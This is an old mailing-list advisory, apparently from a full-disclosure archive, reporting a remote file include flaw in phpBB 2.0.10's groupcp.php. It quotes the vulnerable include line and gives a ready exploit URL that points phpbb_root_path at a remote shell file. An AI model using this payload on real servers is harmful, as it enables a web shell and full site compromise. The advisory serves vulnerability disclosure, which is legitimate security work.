OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
PhpBB<=2.0.10 (groupcp.php) Remote File Include Vulnerability

From: mahmood ali (mah_k_2000hotmail.com)
Date: Wed Oct 18 2006 - 07:00:31 CDT


###########################################
PhpBB<=2.0.10 (groupcp.php) Remote File Include Vulnerability
###########################################

Source Code:
http://www.comscripts.com/jump.php?action=script&id=666
###########################################

Vulnerable Code:_
include($phpbb_root_path . 'includes/page_header.'.$phpEx);

;
###########################################

Exploit :
http://www.vicTim.com/[PhpBB]/groupcp.php?phpbb_root_path=shell.txt?
###########################################

Discoverd By : Mahmood_ali
Conatact : mah_k_2000hotmail.com
###########################################

Special Greetings :_ Tryag-Team
###########################################

_________________________________________________________________
Windows Live™ Messenger has arrived. Click here to download it for free!
http://imagine-msn.com/messenger/launch80/?locale=en-gb